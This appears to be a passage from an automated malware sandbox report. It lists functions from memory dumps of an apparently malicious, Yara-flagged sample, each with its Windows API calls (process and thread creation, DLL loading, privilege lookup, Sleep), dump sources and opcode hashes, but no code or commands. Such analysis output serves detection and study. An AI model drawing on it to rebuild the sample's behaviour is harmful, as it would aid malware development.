                                                          • Instruction Fuzzy Hash: C5900271A0204802D100B6999408A4A000597E1341F51D012E5014959EC7A588917175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5ce3ce5d306d7630857a825242b969dcf0c173ccd5dcc59a34c64b297e20f75e
                                                          • Instruction ID: 8dec528bf514aa9d916bd3215986d643794179cdd7247730cf528ce83cb1d532
                                                          • Opcode Fuzzy Hash: 5ce3ce5d306d7630857a825242b969dcf0c173ccd5dcc59a34c64b297e20f75e
                                                          • Instruction Fuzzy Hash: 34900271B1218802D110B259C404B0A000597D2241F51C412E081495CD87D588917166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2eca08949df8cb339f860f41b9e7b127f65552fc5063c2bd04ad26d31d5fd969
                                                          • Instruction ID: 6f5b0e087939bf5c8144af2b99bd3f8874791cca320480e1171eb251c22831c8
                                                          • Opcode Fuzzy Hash: 2eca08949df8cb339f860f41b9e7b127f65552fc5063c2bd04ad26d31d5fd969
                                                          • Instruction Fuzzy Hash: AA900269A1304402D180B2599408A0E000597D2242F91D416E000595CCCB5588696365
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: af54f9644efbf8b0b4957cd1cf73fb4fb5ed8491d6f1a52f49a21465651e4661
                                                          • Instruction ID: 2b4219eda50f508d268dd96d9edb3240dbf07fd8f34ce181333538e31ef1990b
                                                          • Opcode Fuzzy Hash: af54f9644efbf8b0b4957cd1cf73fb4fb5ed8491d6f1a52f49a21465651e4661
                                                          • Instruction Fuzzy Hash: E9900261A1284442D200B6698C14F0B000597D1343F51C116E0144958CCB5588616565
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1f438b1a90075c7403527b123f9932de41670fd7b91b26a50a424b2470dc59da
                                                          • Instruction ID: f5f196e80b5a0922776b300e931ba934570be04fe0a9e0a72e6687d3e56727c3
                                                          • Opcode Fuzzy Hash: 1f438b1a90075c7403527b123f9932de41670fd7b91b26a50a424b2470dc59da
                                                          • Instruction Fuzzy Hash: 9F900271A0608C42D140B2598404E4A001597D1345F51C012E0054A98D97658D55B6A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2b0956acea3bd7384ec62b980d99ef0d5b8767b15d64f592aa5baef3444063a1
                                                          • Instruction ID: 2632d9f128e68a191ef459941924308cca192acee9956ebd93b6e383838b04de
                                                          • Opcode Fuzzy Hash: 2b0956acea3bd7384ec62b980d99ef0d5b8767b15d64f592aa5baef3444063a1
                                                          • Instruction Fuzzy Hash: E4900271A0204C02D180B2598404A4E000597D2341F91C016E0015A58DCB558A5977E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4a1541a206d8e7e94984ca7e5c8cd63adcfc03157813f6326d9440fefaef9f83
                                                          • Instruction ID: c7e58e2505f9c922b712f4b1fcfc92565819c8a97191452c0396f5ce7896a410
                                                          • Opcode Fuzzy Hash: 4a1541a206d8e7e94984ca7e5c8cd63adcfc03157813f6326d9440fefaef9f83
                                                          • Instruction Fuzzy Hash: 2F900271A0204C42D100B2598404F4A000597E1341F51C017E0114A58D8755C8517565
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 013589def87608d058563abecd02bde88a886fa397fef4f69007af0fb067180e
                                                          • Instruction ID: 45ced5cac97679b18ccab9f1981c830e18327fada9015aae8be3bc27bd47c030
                                                          • Opcode Fuzzy Hash: 013589def87608d058563abecd02bde88a886fa397fef4f69007af0fb067180e
                                                          • Instruction Fuzzy Hash: 77900271A020CC02D110B259C404B4E000597D1341F55C412E4414A5CD87D588917165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2220fe78d4ff523156ffdb745d57cf2c917d039632a8f1cd86d7a6987c61ec56
                                                          • Instruction ID: a2aa13a29c4bfb271c967840fef30819d1fb3f7418fed10f1e14cce1beb3ea1e
                                                          • Opcode Fuzzy Hash: 2220fe78d4ff523156ffdb745d57cf2c917d039632a8f1cd86d7a6987c61ec56
                                                          • Instruction Fuzzy Hash: 80900265A12044030105F659470490B004697D6391351C022F1005954CD76188616165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2a3df872fb28391cb7629b046c8de78ce759e5f21bfc9b4947a3f8976bca1450
                                                          • Instruction ID: 2bc5d1b46dbf0efbf9c71cd136f6479d0b29a9a2b80475790975c1198b832e77
                                                          • Opcode Fuzzy Hash: 2a3df872fb28391cb7629b046c8de78ce759e5f21bfc9b4947a3f8976bca1450
                                                          • Instruction Fuzzy Hash: 409002B1A0204802D140B2598404B4A000597D1341F51C012E5054958E87998DD576A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6f9404d0f9c5c7dc8d0e92f1b0cdc85c3795b5cd2f71531ba83ad273ca498a42
                                                          • Instruction ID: 39149bd023eec77296468fd4c434b729b7e1ca803a17ffb937de06376ec9d2cc
                                                          • Opcode Fuzzy Hash: 6f9404d0f9c5c7dc8d0e92f1b0cdc85c3795b5cd2f71531ba83ad273ca498a42
                                                          • Instruction Fuzzy Hash: 129002A1A03044034105B2598414A1A400A97E1241B51C022E1004994DC76588917169
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b55b7d496885cbb91cd04630b940782cb44e4669bd47e0dc0ebed82ca3187885
                                                          • Instruction ID: 54fd68e02b4999991d332ba469897287763930f307a6b09ff080cb95a8431664
                                                          • Opcode Fuzzy Hash: b55b7d496885cbb91cd04630b940782cb44e4669bd47e0dc0ebed82ca3187885
                                                          • Instruction Fuzzy Hash: 209002A1B4204842D100B2598414F0A0005D7E2341F51C016E1054958D8759CC52716A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6410a4e742467ad54858c501f32a44dbb25d427da35938ebdc273197f165caeb
                                                          • Instruction ID: 7ec71438c3a0d8e2ef484ffc36a73e7874b93d20f5d64d6b960b48ba66477891
                                                          • Opcode Fuzzy Hash: 6410a4e742467ad54858c501f32a44dbb25d427da35938ebdc273197f165caeb
                                                          • Instruction Fuzzy Hash: 80900261A43085525545F259840490B4006A7E1281791C013E1404D54C87669856E665
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03479860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c7f4c286b6f24a0071ac3c8ff1539f5b801893043de226249c945f359fa9adb
                                                          • Instruction ID: 3f1d5b0cf453480f842e4a92be4c8629367150cacce294008cde6509331d2c67
                                                          • Opcode Fuzzy Hash: 3c7f4c286b6f24a0071ac3c8ff1539f5b801893043de226249c945f359fa9adb
                                                          • Instruction Fuzzy Hash: A6900271A0204813D111B2598504B0B000997D1281F91C413E041495CD97968952B165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00966ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 00966F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: e8150669397631c32b31747c079891f88f222ef0fac78ef56ba6b68bfc893ffa
                                                          • Instruction ID: 0fa2395014ce7957552a878dabdd8ff032360f04873e73fbb71d5e5caaf77da3
                                                          • Opcode Fuzzy Hash: e8150669397631c32b31747c079891f88f222ef0fac78ef56ba6b68bfc893ffa
                                                          • Instruction Fuzzy Hash: F531AFB1601704BBC715DFA8D8A1FA7BBB8BB88700F00841DF65A9B241D770B945CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00966EC7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 70sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 00966F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 275e0b5c8e5b745f337ed52dab806b8ff802615e69e6f8dfb737d199034e7a68
                                                          • Instruction ID: c7deaf06d027063e4f58121b256ca498c4e196ca429ed90354e78553b845be17
                                                          • Opcode Fuzzy Hash: 275e0b5c8e5b745f337ed52dab806b8ff802615e69e6f8dfb737d199034e7a68
                                                          • Instruction Fuzzy Hash: 8421BBB1A01701ABD711DFA8D8A1F6BBBB8BB88300F00841DF61A9B241D375E855CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009684B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00953B93), ref: 009684ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: f2cc40d34bdf135252f8d4ce53a4a863da9e50bd12b0f4bd2ff568ab2057f06d
                                                          • Instruction ID: 3a569a244fd843b0d4092d8222d24dee4077e573a47ca897b874aacc11e4889d
                                                          • Opcode Fuzzy Hash: f2cc40d34bdf135252f8d4ce53a4a863da9e50bd12b0f4bd2ff568ab2057f06d
                                                          • Instruction Fuzzy Hash: C6E06DB1600205AFDB18DF65CC44ED77769EF84390F114659BD18AB281CA31E811CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009684C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00953B93), ref: 009684ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 2706e9c6a2e1e0ce585761eaa700511239a53f92554b585157891602b3def9ec
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: F6E01AB12002046BDB14DF59CC45EA777ACAF88750F014554BA085B281CA30E9108AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00957260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009572BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009572DB
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction ID: 90a68dbcb4f5f193657878e9ad3d712a6094130691a161aecffe221d53c2d17c
                                                          • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction Fuzzy Hash: 2101A731A8022877E721A6959C03FFE776C5B40B51F144115FF04BA1C2E6A46A0A47F6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00959B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00959B82
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: 5699d0ead25559b64561e0c8147cdd20ae35546770f508f159b7e49f9709ed72
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: F4011EB5D4020DBBEF10EAE5EC42F9DB3789B54308F004195ED08A7241F671EB58CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0096852D, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00968584
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: cd78935640b7c6ff6dd91ce4c78e7c5617347ce9bc90c87e45a3b8631eb8e86c
                                                          • Instruction ID: a54d612e3d64c9c716135942e4992fb966b5a5b734fcfd5107710a8dc14f3dfb
                                                          • Opcode Fuzzy Hash: cd78935640b7c6ff6dd91ce4c78e7c5617347ce9bc90c87e45a3b8631eb8e86c
                                                          • Instruction Fuzzy Hash: BD019DB2210108ABCB54DF99DC80EEB77A9AF8C354F158259FA0DE7251D630E951CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00968584
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 003c771f6e87084bab369097bd08d281417e51991a3a5097130716f4f4f99437
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: D201AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00967000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0095CCC0,?,?), ref: 0096703C
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                          • Instruction ID: cb5ebd82030816e5fdc73ff8d6b91241de1333d6a7041c229dc2f96372f3b121
                                                          • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                          • Instruction Fuzzy Hash: 0CE092333913043AE3306599AC03FA7B39CCBC1B24F150026FA0DEB2C1D596F90142A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00966FF4, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0095CCC0,?,?), ref: 0096703C
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: d091375c37fc1b06a48d7013648e0d8a417590cafcfa7438ea8609df21464e71
                                                          • Instruction ID: 7d2c61ebd6191212ecd783de5daab629e8d8ec03cdbc0ee3be77ad0661e54f41
                                                          • Opcode Fuzzy Hash: d091375c37fc1b06a48d7013648e0d8a417590cafcfa7438ea8609df21464e71
                                                          • Instruction Fuzzy Hash: 94F06D7379160036E3306A59DC03FA7B6ACDB85B24F151029FA49EB2C2D6AAF94142A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968616, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0095CF92,0095CF92,?,00000000,?,?), ref: 00968650
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: f9bbeffd305243a02c246050f3ff7fe0d9b453d236f95dacd16a6131b24131c5
                                                          • Instruction ID: 57c6892936c8aa223f547f72c703b9ec3c561822a4d46a1d0efb9a8360e31aab
                                                          • Opcode Fuzzy Hash: f9bbeffd305243a02c246050f3ff7fe0d9b453d236f95dacd16a6131b24131c5
                                                          • Instruction Fuzzy Hash: 43E030B5300204AFCB14DF58DC45EE73BA99F59250F014559F9489B282C531A90187B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00963506,?,00963C7F,00963C7F,?,00963506,?,?,?,?,?,00000000,00000000,?), ref: 009684AD
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: a4e21e3f079550ef47b0818560000b92e9bd584541a93a6ad6c4981e5796d031
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 8BE012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA085B282CA30F9108AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00968620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0095CF92,0095CF92,?,00000000,?,?), ref: 00968650
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 08cff50d6de84357e10c5f1c7ecff06907ddde82a5cd985abcb5413a190b0a6f
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: F5E01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA085B281C930E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0095D3F7, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00957C63,?), ref: 0095D42B
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2103c3b24ca00424aac7e7410e8d20697b68ae8c7bb77de57022ccf28c8ee824
                                                          • Instruction ID: 95813a240b575ad32041b4b903310da23d5185a64f46b9713bcea6e0f11058ea
                                                          • Opcode Fuzzy Hash: 2103c3b24ca00424aac7e7410e8d20697b68ae8c7bb77de57022ccf28c8ee824
                                                          • Instruction Fuzzy Hash: 20E0C2713802403AE621EE749C32FB27B45DB5A710F0D44B8F989D67C3D925D4118120
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0095D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00957C63,?), ref: 0095D42B
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Offset: 00950000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
